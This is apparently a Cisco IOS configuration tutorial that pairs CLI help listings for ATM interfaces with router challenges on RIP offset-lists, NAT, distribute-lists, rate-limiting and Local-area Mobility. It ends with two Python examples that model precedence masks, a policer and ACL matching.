Assign a custom queue list to an interface
decnet
Interface DECnet config commands
default
Set a command to its defaults
delay
Specify interface throughput delay
description
Interface specific description
dspu
Down Stream PU
exit
Exit from interface configuration mode
fair-queue
Enable Fair Queuing on an Interface
fras
DLC Switch Interface Command
help
Description of the interactive help system
hold-queue
Set hold queue depth
ip
Interface Internet Protocol config commands
ipv6
IPv6 interface subcommands
ipx
Novell/IPX interface subcommands
isis
IS-IS commands
iso-igrp
ISO-IGRP interface subcommands
lan-name
LAN Name command
lane
Modify LANE parameters
lat
LAT commands
llc2
LLC2 Interface Subcommands
load-interval
Specify interval for load calculation for an
interface
locaddr-priority
Assign a priority group
logging
Configure logging for interface
loopback
Configure internal loopback on an interface
mac-address
Manually set interface MAC address
map-group
Configure static map group
max-reserved-bandwidth Maximum Reservable Bandwidth on an Interface
mls
mls sub/interface commands
mpls
Configure MPLS interface parameters
mpoa
MPOA interface configuration commands
mtu
Set the interface Maximum Transmission Unit (MTU)
multilink-group
Put interface in a multilink bundle
multiring
Enable RIF usage for a routable protocol
netbios
Use a defined NETBIOS access list or enable
name-caching
no
Negate a command or set its defaults
ntp
Configure NTP
priority-group
Assign a priority group to an interface
pvc
Configure ATM PVC parameters
random-detect
Enable Weighted Random Early Detection (WRED) on an
Interface
rate-limit
Rate Limit
sap-priority
Assign a priority group

service-policy
Configure QoS Service Policy
shutdown
Shutdown the selected interface
smrp
Simple Multicast Routing Protocol interface subcommands
sna
SNA pu configuration
snapshot
Configure snapshot support on the interface
snmp
Modify SNMP interface parameters
source-bridge
Configure interface for source-route bridging
squelch
10BaseT 100 meter limit enforcement
sscop
SSCOP Interface Subcommands
standby
Interface HSRP configuration commands
svc
Configure ATM SVC parameters
tag-switching
Tag Switching interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
transmit-interface
Assign a transmit interface to a receive-only interface
vines
VINES interface subcommands
xns
XNS interface subcommands
(config-if)# no ?
access-expression
Build a bridge boolean access expression
apollo
Apollo interface subcommands
appletalk
Appletalk interface subcommands
arp
Set arp type (arpa, probe, snap) or timeout
atm
Modify ATM parameters
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bridge-group
Transparent bridging interface parameters
carrier-delay
Specify delay for interface transitions
cdp
CDP interface subcommands
class-int
Configure default vc-class name
clns
CLNS interface subcommands
crypto
Encryption/Decryption commands
custom-queue-list
Assign a custom queue list to an interface
decnet
Interface DECnet config commands
delay
Specify interface throughput delay
description
Interface specific description
dspu
Down Stream PU
fair-queue
Enable Fair Queuing on an Interface
fras
DLC Switch Interface Command
hold-queue
Set hold queue depth
ip
Interface Internet Protocol config commands
ipv6
IPv6 interface subcommands
ipx
Novell/IPX interface subcommands
isis
IS-IS commands
iso-igrp
ISO-IGRP interface subcommands
lan-name
LAN Name command
lane
Modify LANE parameters
lat
LAT commands
llc2
LLC2 Interface Subcommands
load-interval
Specify interval for load calculation for an interface
locaddr-priority
Assign a priority group
logging
Configure logging for interface
loopback
Configure internal loopback on an interface
mac-address
Manually set interface MAC address
map-group
Configure static map group
max-reserved-bandwidth
Maximum Reservable Bandwidth on an Interface
mls
mls sub/interface commands
mpls
Configure MPLS interface parameters
mpoa
MPOA interface configuration commands
mtu
Set the interface Maximum Transmission Unit (MTU)
multilink-group
Put interface in a multilink bundle
multiring
Enable RIF usage for a routable protocol
netbios
Use a defined NETBIOS access list or enable name-caching
ntp
Configure NTP
priority-group
Assign a priority group to an interface
pvc
Configure ATM PVC parameters
random-detect
Enable Weighted Random Early Detection (WRED) on an Interface
rate-limit
Rate Limit
sap-priority
Assign a priority group
service-policy
Configure QoS Service Policy
shutdown
Shutdown the selected interface
smrp
Simple Multicast Routing Protocol interface subcommands
sna
SNA pu configuration
snapshot
Configure snapshot support on the interface
snmp
Modify SNMP interface parameters
source-bridge
Configure interface for source-route bridging
squelch
10BaseT 100 meter limit enforcement
sscop
SSCOP Interface Subcommands
standby
Interface HSRP configuration commands
svc
Configure ATM SVC parameters
tag-switching
Tag Switching interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
transmit-interface
Assign a transmit interface to a receive-only interface
vines
VINES interface subcommands
xns
XNS interface subcommands
(config-if)# no atm ?
address-registration
Address Registration
arp-server
Configure IP ARP Server
auto-configuration
ATM interface auto configuration
class
Configure default map class name
classic-ip-extensions
Specify the type of Classic IP extensions
clock
ATM TX clock source
e164
E164 Configuration
esi-address
7-octet ATM ESI address
idle-timeout
Set idle time before disconnecting a SVC
ilmi-enable
ILMI Configuration
ilmi-keepalive
Keepalive polling configuration
ilmi-pvc-discovery
Enable ILMI PVC Discovery
multicast
E.164 ATM SMDS address
multipoint-interval
Set minimum interval between multipoint party additions
multipoint-signalling
Multipoint Signalling
nsap-address
20-octet ATM NSAP address
oversubscribe
Allow oversubscription of ATM link
pvc
Create a PVC
rate-queue
ATM Rate Queue
smds-address
E.164 ATM SMDS address
sonet
ATM SONET mode
uni-version
UNI Version
vc-per-vp
ATM VCIs per VPI
(config-if)# no atm ilmi-keepalive ?
<1-65535> seconds
<cr>
(config-if)# no atm ilmi-keepalive
(config-if)# no ip address ?


A.B.C.D IP address
<cr>
(config-if)# no ip address
(config-if)# exit
(config)# int atm0.101 ?
mpls
Treat as an MPLS link
multipoint
Treat as a multipoint link
point-to-point Treat as a point-to-point link
tag-switching
Treat as a tag switching link (obsolete, use mpls)
(config-subif)# ?
Interface configuration commands:
apollo
Apollo interface subcommands
appletalk
Appletalk interface subcommands
arp
Set arp type (arpa, probe, snap) or timeout
atm
Modify ATM parameters
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bridge-group
Transparent bridging interface parameters
cdp
CDP interface subcommands
class-int
Configure default vc-class name
clns
CLNS interface subcommands
crypto
Encryption/Decryption commands
decnet
Interface DECnet config commands
default
Set a command to its defaults
delay
Specify interface throughput delay
description
Interface specific description
dspu
Down Stream PU
exit
Exit from interface configuration mode
fras
DLC Switch Interface Command
ip
Interface Internet Protocol config commands
ipv6
IPv6 interface subcommands
ipx
Novell/IPX interface subcommands
isis
IS-IS commands
iso-igrp
ISO-IGRP interface subcommands
lane
Modify LANE parameters
lat
LAT commands
llc2
LLC2 Interface Subcommands
map-group
Configure static map group
mls
mls sub/interface commands
mpls
Configure MPLS interface parameters
mtu
Set the interface Maximum Transmission Unit (MTU)
multiring
Enable RIF usage for a routable protocol
netbios
Use a defined NETBIOS access list or enable name-caching
no
Negate a command or set its defaults
ntp
Configure NTP
pvc
Configure ATM PVC parameters
rate-limit
Rate Limit
service-policy Configure QoS Service Policy
shutdown
Shutdown the selected interface
smrp
Simple Multicast Routing Protocol interface subcommands
sna
SNA pu configuration
snapshot
Configure snapshot support on the interface
source-bridge
Configure interface for source-route bridging
sscop
SSCOP Interface Subcommands
standby
Interface HSRP configuration commands
svc
Configure ATM SVC parameters
tag-switching
Tag Switching interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
vines
VINES interface subcommands
xns
XNS interface subcommands


(config-subif)# ip address 10.0.0.1 255.255.255.0


(config-subif)# pvc ?
<0-7>
Enter VPI/VCI value(slash required)
<1-1023> Enter VCI value
WORD
Optional handle to refer to this connection
(config-subif)# pvc 0/99 ?
smds Configure ATM SMDS PVC parameters
<cr>
(config-if-atm-vc)# ?
ATM virtual circuit configuration commands:
atm
atm pvc commands
broadcast
Pseudo-broadcast
class-vc
Configure default vc-class name
default
Set a command to its defaults
dialer
set dialer pool this pvc belongs to
encapsulation Select ATM Encapsulation for VC
exit-vc
Exit from ATM VC configuration mode
ilmi
Configure ILMI management
inarp
Change the inverse arp timer on the PVC
no
Negate a command or set its defaults
oam
Configure oam parameters
oam-pvc
Send oam cells on this pvc
pppoe-client
pppoe client
protocol
Map an upper layer protocol to this connection.
ubr
Enter Unspecified Peak Cell Rate (pcr) in Kbps.
ubr+
Enter Peak Cell Rate(pcr)Minimum Cell Rate(mcr) in Kbps.
vbr-nrt
Enter Variable Bit Rate (pcr)(scr)(bcs)
vcci
VCC Identifier
(config-if-atm-vc)# pro ?
A.B.C.D
Protocol specific address
aarp
AppleTalk ARP
apollo
Apollo Domain
appletalk
AppleTalk
arp
IP ARP
bridge
Bridging
bstun
Block Serial Tunnel
cdp
Cisco Discovery Protocol
clns
ISO CLNS
clns_es
ISO CLNS End System
clns_is
ISO CLNS Intermediate System
cmns
ISO CMNS
compressedtcp
Compressed TCP
decnet
DECnet
decnet_node
DECnet Node
decnet_prime_router DECnet Prime Router
decnet_router-l1
DECnet Router L1
decnet_router-l2
DECnet Router L2
dlsw
Data Link Switching
ip
IP
ipv6
IPV6
ipx
Novell IPX
llc2
llc2
pad
PAD links
ppp
LLC PPP over AAL5 Encapsulation
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
Remote Source-Route Bridging
snapshot
Snapshot routing support
stun
Serial Tunnel
vines
Banyan VINES
xns
Xerox Network Services


(config-if-atm-vc)# pro ip ?
A.B.C.D Protocol specific address
inarp
Use inarp on this protocol
(config-if-atm-vc)# pro ip 10.1.1.2 ?
broadcast Pseudo-broadcast
no
Prevent Pseudo-broadcast on this connection
<cr>
(config-if-atm-vc)# protocol ip 10.1.1.2 broad ?
<cr>
(config-if-atm-vc)# protocol ip 10.1.1.2 broadcast
(config-if-atm-vc)# encap ?
aal5ciscoppp Cisco PPP over AAL5 Encapsulation
aal5mux
AAL5+MUX Encapsulation
aal5nlpid
AAL5+NLPID Encapsulation
aal5snap
AAL5+LLC/SNAP Encapsulation
(config-if-atm-vc)# encap aal5snap
(config-if-atm-vc)# exit
(config-if)# exit
# sh atm ?
arp-server
ATM ARP Server Table
class-links
ATM vc-class links
ilmi-configuration
Display Top level ILMI
ilmi-status
Display ATM Interface ILMI information
interface
Interfaces and ATM information
map
ATM static mapping
pvc
ATM PVC information
route
ATM route
signalling
ATM Signalling commands
svc
ATM SVC information
traffic
ATM statistics
vc
ATM VC information
vp
ATM VP information

# sh atm map
Map list ATM0.101pvc1 : PERMANENT
ip 1.1.1.1 maps to VC 1, VPI 0, VCI 99, ATM0.101, broadcast
# sh atm pvc
           VCD /                                        Peak  Avg/Min  Burst
Interface  Name    VPI  VCI  Type  Encaps  SC   Kbps  Kbps     Cells  Sts
0.101
# sh atm tr
0 Input packets
0 Output packets
0 Broadcast packets
0 Packets received on non-existent VC
0 Packets attempted to send on non-existent VC
0 OAM cells received
F5 InEndloop: 0, F5 InSegloop: 0, F5 InAIS: 0, F5 InRDI: 0
F4 InEndloop: 0, F4 InSegloop: 0, F4 InAIS: 0, F4 InRDI: 0
0 OAM cells sent
F5 OutEndloop: 0, F5 OutSegloop: 0, F5 OutRDI: 0
F4 OutEndloop: 0, F4 OutSegloop: 0, F4 OutRDI: 0
0 OAM cell drops
# sh atm vc
VC not configured on interface ATM0
           VCD /                                        Peak  Avg/Min  Burst
Interface  Name    VPI  VCI  Type  Encaps  SC   Kbps  Kbps     Cells  Sts
0.101      1       0    99   PVC   SNAP    UBR                        INAC
# sh atm vp
                  Data  CES   Peak  CES
Interface  VPI    VCs   VCs   Kbps  Kbps  Status

Cisco Router Challenge 201


Outline
This challenge involves advertising an interface so that only the next router can reach it.
For this an offset of 14 is added to the route for a local interface, so that the next router
stores a metric of 15; routers beyond that then receive a hop count of 16, which RIP treats as
infinity (unreachable).
Objectives
The objectives of this challenge are to:

Define loopback interface.


Define an offset of 14 for the route to the interface.
Define networks to advertise.
Define the network to offset with an access-list

Outline
(config)# int loopback 22
(config-if)# ip address 60.1.1.1 255.255.255.0
(config-if)# exit
(config)# router rip
(config-router)# version 2
(config-router)# offset-list 1 out 14 fa0/1
(config-router)# network 60.0.0.0
(config-router)# network 172.0.0.0
(config-router)# exit
(config)# access-list 1 permit 60.1.1.0

Example
(config)# int loopback 22
(config-if)# ip address 60.1.1.1 255.255.255.0
(config-if)# exit
(config)# router rip
(config-router)# version 2
(config-router)# offset-list ?
<0-99>
Access list of networks to apply offset (0 selects all networks)
<1300-1999> Access list of networks to apply offset (expanded range)
WORD
Access-list name
(config-router)# offset-list 1 ?
in
Perform offset on incoming updates
out Perform offset on outgoing updates


(config-router)# offset-list 1 out ?
<0-16> Offset
(config-router)# offset-list 1 out 14 ?
Async
Async interface
BVI
Bridge-Group Virtual Interface
CTunnel
CTunnel interface
Dialer
Dialer interface
FastEthernet
FastEthernet IEEE 802.3
Loopback
Loopback interface
MFR
Multilink Frame Relay bundle interface
Multilink
Multilink-group interface
Null
Null interface
Serial
Serial
Tunnel
Tunnel interface
Vif
PGM Multicast Host interface
Virtual-Template
Virtual Template interface
Virtual-TokenRing Virtual TokenRing
<cr>
(config-router)# offset-list 1 out 14 fa0/1 ?
<cr>
(config-router)# offset-list 1 out 14 fa0/1
(config-router)# network 60.0.0.0
(config-router)# network 172.0.0.0
(config-router)# exit
(config)# access-list 1 permit 60.1.1.0

Thus the next router receives the loopback network with a hop metric of 15 (the normal
metric of 1 plus the offset of 14) and installs it; when it re-advertises the route the metric
becomes 16, so any further routers treat the network as unreachable.

Cisco Router Challenge 202


Outline
This challenge involves converting a RIP multicast into a unicast to a specific address.
Normally RIPv2 updates are sent to the multicast address 224.0.0.9 on UDP port 520 (RIPv1 uses broadcast).
Objectives
The objectives of this challenge are to:

Define E0.
Define conversion for NAT to detect an RIP multicast and convert it to a unicast
destination address.

Outline
(config)# int e0
(config-if)# ip address 60.1.1.1 255.255.255.0
(config-if)# exit
(config)# ip nat outside source static udp 60.1.1.2 520 224.0.0.0 520

This translates a RIP (UDP port 520) update addressed to 224.0.0.0 into a unicast to 60.1.1.2
(also on UDP port 520). Note that a RIPv2 router actually multicasts to 224.0.0.9, so the
address given in the translation must match the one the routers really send to; confirm it
with debug ip rip or a packet capture before relying on the translation.
Example
(config)# int e0
(config-if)# ip address 60.1.1.1 255.255.255.0
(config-if)# exit
(config)# ip nat ?
inside
Inside address translation
outside
Outside address translation
pool
Define pool of addresses
service
Special translation for application using non-standard port
translation NAT translation entry configuration
(config)# ip nat o ?
source Source address translation
(config)# ip nat o s ?
list
Specify access list describing global addresses
route-map
Specify route-map
static
Specify static global->local mapping

(config)# ip nat o s s ?
A.B.C.D Outside global IP address
network Subnet translation
tcp
Transmission Control Protocol
udp
User Datagram Protocol
(config)# ip nat o s s u ?
A.B.C.D Outside global IP address
(config)# ip nat o s s u 60.1.1.2 ?
<1-65535> Global UDP/TCP port
(config)# ip nat o s s u 60.1.1.2 520 ?
A.B.C.D Outside local IP address
(config)# ip nat o s s u 60.1.1.2 520 60.1.1.2 ?
<1-65535> Local UDP/TCP port
(config)# ip nat o s s u 60.1.1.2 520 60.1.1.2 520 ?
add-route
Add a static route for outside local address
extendable Extend this translation when used
no-alias
Do not create an alias for the local address
<cr>
(config)# ip nat outside source static udp 60.1.1.2 520 224.0.0.0 520

Cisco Router Challenge 203


Outline
This challenge involves creating a distribution-list, which does not send routing updates on
a specific network range.

Objectives
The objectives of this challenge are to:

Define a distribute-list.
Define a range of network addresses not to send routing updates to.

Outline
(config)# int e0
(config-if)# ip address 60.1.1.1 255.255.255.0
(config-if)# ip address 60.1.1.2 255.255.255.0 secondary
(config-if)# exit
(config)# router rip
(config-router)# distribute-list 1 out e0
(config-router)# distribute-list 1 out s0
(config-router)# exit
(config)# access-list 1 deny 60.60.60.0
(config)# access-list 1 permit any

In this case there will be no routing tables sent to the 60.60.60.0 network.
Background
(config)# int e0
(config-if)# ip address 60.1.1.1 255.255.255.0
(config-if)# ip address 60.1.1.2 255.255.255.0 secondary
(config-if)# exit
(config)# router rip
(config-router)# distribute-list ?
  <1-199>      IP access list number
  <1300-2699>  IP expanded access list number
  WORD         Access-list name
  gateway      Filtering incoming updates based on gateway
  prefix       Filter prefixes in routing updates
(config-router)# distribute-list 1 ?
  in   Filter incoming routing updates
  out  Filter outgoing routing updates
(config-router)# distribute-list 1 out ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  CDMA-Ix            CDMA Ix interface
  CTunnel            CTunnel interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  Lex                Lex interface
  Loopback           Loopback interface
  MFR                Multilink Frame Relay bundle interface
  Multilink          Multilink-group interface
  Null               Null interface
  Port-channel       Ethernet Channel of interfaces
  Tunnel             Tunnel interface
  Vif                PGM Multicast Host interface
  Virtual-PPP        Virtual PPP interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
  <cr>
(config-router)# distribute-list 1 out e0
(config-router)# distribute-list 1 out s0
(config-router)# exit
(config)# access-list 1 deny 60.60.60.0
(config)# access-list 1 permit any

Cisco Router Challenge 204


Outline
This challenge involves creating a rate-limit for QoS.
Objectives
The objectives of this challenge are to:

Define an interface rate limit.
Define an access-list for a rate-limit.

Outline
(config)# int e0
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit exceed-action drop
(config-if)# exit
(config)# access-list rate-limit 20 mask A2

Background
(config)# access-list ?
  <1-99>            IP standard access list
  <100-199>         IP extended access list
  <1100-1199>       Extended 48-bit MAC address access list
  <1300-1999>       IP standard access list (expanded range)
  <200-299>         Protocol type-code access list
  <2000-2699>       IP extended access list (expanded range)
  <700-799>         48-bit MAC address access list
  dynamic-extended  Extend the dynamic ACL abolute timer
  rate-limit        Simple rate-limit specific access list
(config)# access-list rate-limit ?
  <1-99>     Precedence ACL index
  <100-199>  MAC address ACL index
(config)# access-list rate-limit 20 ?
  <0-7>  Precedence
  mask   Use precedence bitmask
(config)# access-list rate-limit 20 mask ?
  <0-FF>  Precedence bit mask
(config)# access-list rate-limit 20 mask A2 ?
  <cr>
(config)# access-list rate-limit 20 mask A2
(config)# int e0
(config-if)# rate-limit ?
  input   Rate limit on input
  output  Rate limit on output
(config-if)# rate-limit in ?
  <8000-2000000000>  Bits per second
  access-group       Match access list
  qos-group          Match qos-group ID
(config-if)# rate-limit input access-group ?
  <1-2699>    Access list index
  rate-limit  Match rate-limit access list
(config-if)# rate-limit input access-group rate-limit ?
  <1-199>  Rate-limit access list index
(config-if)# rate-limit input access-group rate-limit 20 ?
  <8000-2000000000>  Bits per second
(config-if)# rate-limit input access-group rate-limit 20 8000 ?
  <1000-512000000>  Normal burst bytes
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 ?
  <2000-1024000000>  Maximum burst bytes
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 ?
  conform-action  action when rate not exceeded
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform ?
  continue           scan other rate limits
  drop               drop packet
  set-prec-continue  rewrite packet precedence, scan other rate limits
  set-prec-transmit  rewrite packet precedence and send it
  set-qos-continue   set qos-group, scan other rate limits
  set-qos-transmit   set qos-group and send it
  transmit           transmit packet
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit ?
  exceed-action  action when rate exceeded
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit exceed-action ?
  continue           scan other rate limits
  drop               drop packet
  set-prec-continue  rewrite packet precedence, scan other rate limits
  set-prec-transmit  rewrite packet precedence and send it
  set-qos-continue   set qos-group, scan other rate limits
  set-qos-transmit   set qos-group and send it
  transmit           transmit packet
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit exceed-action drop ?
  <cr>
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit exceed-action drop

For the mask, each IP precedence value maps to one bit:

0  0000 0001
1  0000 0010
2  0000 0100
3  0000 1000
4  0001 0000
5  0010 0000
6  0100 0000
7  1000 0000

Thus to use one ACL to catch IP precedence values of 1, 5 and 7, the values are added
together:

1  0000 0010
5  0010 0000
7  1000 0000
------------
   1010 0010

Thus the mask, in hex, will be A2 (1010 0010).
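The derivation above, carried through in code as an added example that is not part of the NetworkSims page: precedence_mask() reproduces the A2 bitmask, and Policer models what the interface rate-limit then does with packets the ACL matches. The policer is a simplification assumed for illustration (one token bucket of "normal burst" bytes refilled at the configured bit rate, with no extended-burst borrowing), which is enough to show when conform-action and exceed-action fire; all names in the block are my own.

```python
# Added example (not from the NetworkSims page): precedence bitmask derivation
# for "access-list rate-limit 20 mask A2" plus a simplified token-bucket model
# of "rate-limit input access-group rate-limit 20 8000 1000 2000 ...".

def precedence_mask(precedences):
    """Bit p of the mask selects IP precedence p (0-7)."""
    mask = 0
    for p in precedences:
        if not 0 <= p <= 7:
            raise ValueError(f"IP precedence must be 0-7, got {p}")
        mask |= 1 << p
    return mask


def mask_to_hex(mask):
    """Format the mask as IOS expects it, e.g. 0xA2 -> 'A2'."""
    return f"{mask:02X}"


def precedences_from_mask(mask):
    """Decode a mask back into the precedence values it matches."""
    return [p for p in range(8) if mask & (1 << p)]


def precedence_from_tos(tos):
    """IP precedence is the top three bits of the IPv4 ToS byte."""
    return (tos >> 5) & 0x7


def rate_limit_acl(index, precedences):
    """Build the 'access-list rate-limit' line for a set of precedences."""
    if not 1 <= index <= 99:
        raise ValueError("precedence rate-limit ACL index must be 1-99")
    return f"access-list rate-limit {index} mask {mask_to_hex(precedence_mask(precedences))}"


class Policer:
    """Assumed simplification of the interface rate-limit: one token bucket
    holding at most `normal_burst` bytes, refilled at `bps` bits per second.
    Packets whose precedence is not in the mask bypass the limit entirely."""

    def __init__(self, bps, normal_burst, mask, conform="transmit", exceed="drop"):
        self.rate = bps / 8.0            # bytes per second
        self.depth = float(normal_burst)  # bucket capacity in bytes
        self.tokens = self.depth          # bucket starts full
        self.last = 0.0                   # time of the previous refill
        self.mask, self.conform, self.exceed = mask, conform, exceed

    def packet(self, now, size, tos):
        """Return the action taken for a packet of `size` bytes seen at `now` seconds."""
        if not self.mask & (1 << precedence_from_tos(tos)):
            return "transmit"             # ACL does not match: limit does not apply
        elapsed = max(0.0, now - self.last)
        self.tokens = min(self.depth, self.tokens + elapsed * self.rate)
        self.last = now
        if size <= self.tokens:
            self.tokens -= size
            return self.conform
        return self.exceed


if __name__ == "__main__":
    print(rate_limit_acl(20, [1, 5, 7]))          # access-list rate-limit 20 mask A2
    policer = Policer(8000, 1000, precedence_mask([1, 5, 7]))
    # constructed packets: (time, size in bytes, ToS byte)
    for when, size, tos in [(0.0, 500, 0xA0), (0.0, 600, 0xA0), (0.0, 600, 0x00), (1.0, 600, 0x20)]:
        print(when, size, hex(tos), policer.packet(when, size, tos))
```

With the page's values (8000 bps, 1000-byte normal burst) the bucket refills at only 1000 bytes per second, so a second 600-byte precedence-5 packet arriving in the same instant is dropped while a precedence-0 packet is untouched by the limit.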

Cisco Router Challenge 205


Outline
This challenge involves defining Local-area Mobility (LAM), which allows a router to listen to
foreign ARPs and add them to its routing table, which can then be sent to neighbouring
devices. It thus supports mobility of hosts to different subnets, while still keeping the same
IP address.
Objectives
The objectives of this challenge are to:

Define LAM.
Define redistribution of mobile subnets.

Outline
(config)# int e0
(config-if)# ip mobile arp

(config-if)# exit
(config)# int e1
(config-if)# ip mobile arp
(config-if)# exit
(config)# router ospf 100
(config-router)# redistribute mobile subnets

Background
(config)# int e0
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# ip mobile ?
  arp                    ARP discovery of mobile hosts
  foreign-service        Mobile IP foreign agent service
  prefix-length          Include Prefix-Length extension in advertisement
  registration-lifetime  Time until registration expires
  router-service         Mobile router support
(config-if)# ip mobile arp ?
  access-group  Access list of acceptable mobile hosts
  timers        Set keepalive and holdtime timers
  <cr>
(config-if)# ip mobile arp
(config-if)# int e1
(config-if)# ip address 10.0.1.1 255.255.255.0
(config-if)# ip mobile arp
(config-if)# exit
(config)# router ospf 100
(config-router)# redistribute ?
  bgp          Border Gateway Protocol (BGP)
  connected    Connected
  egp          Exterior Gateway Protocol (EGP)
  eigrp        Enhanced Interior Gateway Routing Protocol (EIGRP)
  igrp         Interior Gateway Routing Protocol (IGRP)
  isis         ISO IS-IS
  iso-igrp     IGRP for OSI networks
  metric       Metric for redistributed routes
  metric-type  OSPF/IS-IS exterior metric type for redistributed routes
  mobile       Mobile routes
  odr          On Demand stub Routes
  ospf         Open Shortest Path First (OSPF)
  rip          Routing Information Protocol (RIP)
  route-map    Route map reference
  static       Static routes
  subnets      Consider subnets for redistribution into OSPF
  tag          Set tag for routes redistributed into OSPF
  <cr>
(config-router)# redistribute mobile ?
  metric       Metric for redistributed routes
  metric-type  OSPF/IS-IS exterior metric type for redistributed routes
  route-map    Route map reference
  subnets      Consider subnets for redistribution into OSPF
  tag          Set tag for routes redistributed into OSPF
  <cr>
(config-router)# redistribute mobile subnets ?
  metric       Metric for redistributed routes
  metric-type  OSPF/IS-IS exterior metric type for redistributed routes
  route-map    Route map reference
  subnets      Consider subnets for redistribution into OSPF
  tag          Set tag for routes redistributed into OSPF
  <cr>
(config-router)# redistribute mobile subnets

Cisco Router Challenge 206


Outline
This challenge involves defining Local-area Mobility (LAM), which allows a router to listen to
foreign ARPs and add them to its routing table, which can then be sent to neighbouring
devices. It thus supports mobility of hosts to different subnets, while still keeping the same
IP address. It uses an ACL to define the range of hosts to be used for LAM.
Objectives
The objectives of this challenge are to:

Define LAM.
Define redistribution of mobile subnets.

Outline
(config)# int e0
(config-if)# ip mobile arp access-group 20
(config-if)# exit
(config)# int e1
(config-if)# ip mobile arp access-group 20
(config-if)# exit
(config)# router ospf 100
(config-router)# redistribute mobile subnets
(config-router)# exit
(config)# access-list 20 permit 10.0.0.0 0.0.0.255

Background
(config)# int e0
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# ip mobile ?
  arp                    ARP discovery of mobile hosts
  foreign-service        Mobile IP foreign agent service
  prefix-length          Include Prefix-Length extension in advertisement
  registration-lifetime  Time until registration expires
  router-service         Mobile router support
(config-if)# ip mobile arp ?
  access-group  Access list of acceptable mobile hosts
  timers        Set keepalive and holdtime timers
  <cr>
(config-if)# ip mobile arp access-group ?
  <1-99>  IP standard access list
  WORD    Access-list name
(config-if)# ip mobile arp access-group 20 ?
  <cr>
(config-if)# ip mobile arp access-group 20
(config-if)# int e1
(config-if)# ip address 10.0.1.1 255.255.255.0
(config-if)# ip mobile arp access-group 20
(config-if)# exit
(config)# router ospf 100
(config-router)# redistribute ?
  bgp          Border Gateway Protocol (BGP)
  connected    Connected
  egp          Exterior Gateway Protocol (EGP)
  eigrp        Enhanced Interior Gateway Routing Protocol (EIGRP)
  igrp         Interior Gateway Routing Protocol (IGRP)
  isis         ISO IS-IS
  iso-igrp     IGRP for OSI networks
  metric       Metric for redistributed routes
  metric-type  OSPF/IS-IS exterior metric type for redistributed routes
  mobile       Mobile routes
  odr          On Demand stub Routes
  ospf         Open Shortest Path First (OSPF)
  rip          Routing Information Protocol (RIP)
  route-map    Route map reference
  static       Static routes
  subnets      Consider subnets for redistribution into OSPF
  tag          Set tag for routes redistributed into OSPF
  <cr>
(config-router)# redistribute mobile ?
  metric       Metric for redistributed routes
  metric-type  OSPF/IS-IS exterior metric type for redistributed routes
  route-map    Route map reference
  subnets      Consider subnets for redistribution into OSPF
  tag          Set tag for routes redistributed into OSPF
  <cr>
(config-router)# redistribute mobile subnets ?
  metric       Metric for redistributed routes
  metric-type  OSPF/IS-IS exterior metric type for redistributed routes
  route-map    Route map reference
  subnets      Consider subnets for redistribution into OSPF
  tag          Set tag for routes redistributed into OSPF
  <cr>
(config-router)# redistribute mobile subnets
(config-router)# exit
(config)# access-list 20 permit 10.0.0.0 0.0.0.255
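The standard access lists of Challenges 203 and 206 do two different jobs: as a distribute-list the ACL is tested against the network address of each route in an outgoing update, and as an "ip mobile arp access-group" it decides which ARP sources become mobile host routes. The matcher below is an added example, not code from the NetworkSims page; the function names are my own, and it implements the IOS standard-ACL rules of first match wins, implicit deny at the end, "any" as a match-all, and a missing wildcard meaning an exact host match (which is why "deny 60.60.60.0" matches only that one address).

```python
# Added example (not from the NetworkSims page): IOS standard ACL semantics
# applied as a distribute-list and as an ip mobile arp access-group filter.
import ipaddress

WILDCARD_ANY = 0xFFFFFFFF


def parse_standard_acl(lines):
    """Parse 'access-list <1-99> permit|deny <addr> [wildcard]' lines.

    A missing wildcard means 0.0.0.0 (exact host match) and 'any' means
    0.0.0.0 255.255.255.255, as IOS interprets them.
    """
    rules = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[0] != "access-list":
            raise ValueError(f"not a standard ACL entry: {line!r}")
        action = parts[2]
        if action not in ("permit", "deny"):
            raise ValueError(f"unknown action in {line!r}")
        if parts[3] == "any":
            addr, wildcard = 0, WILDCARD_ANY
        else:
            addr = int(ipaddress.IPv4Address(parts[3]))
            wildcard = int(ipaddress.IPv4Address(parts[4])) if len(parts) > 4 else 0
        rules.append((action, addr, wildcard))
    return rules


def acl_permits(rules, address):
    """First matching entry wins; no match falls to the implicit deny."""
    value = int(ipaddress.IPv4Address(address))
    for action, addr, wildcard in rules:
        care = ~wildcard & WILDCARD_ANY        # bits that must be equal
        if value & care == addr & care:
            return action == "permit"
    return False


def filter_outgoing_update(rules, routes):
    """distribute-list <acl> out: only routes whose network address the ACL
    permits are advertised to the neighbour."""
    return [route for route in routes if acl_permits(rules, route.split("/")[0])]


def accepted_mobile_hosts(rules, arp_sources):
    """ip mobile arp access-group <acl>: only ARP sources the ACL permits
    are installed as mobile host routes."""
    return [ip for ip in arp_sources if acl_permits(rules, ip)]


if __name__ == "__main__":
    acl1 = parse_standard_acl(["access-list 1 deny 60.60.60.0",
                               "access-list 1 permit any"])
    # constructed RIP update contents
    print(filter_outgoing_update(acl1, ["60.60.60.0/24", "60.1.1.0/24", "10.0.0.0/24"]))
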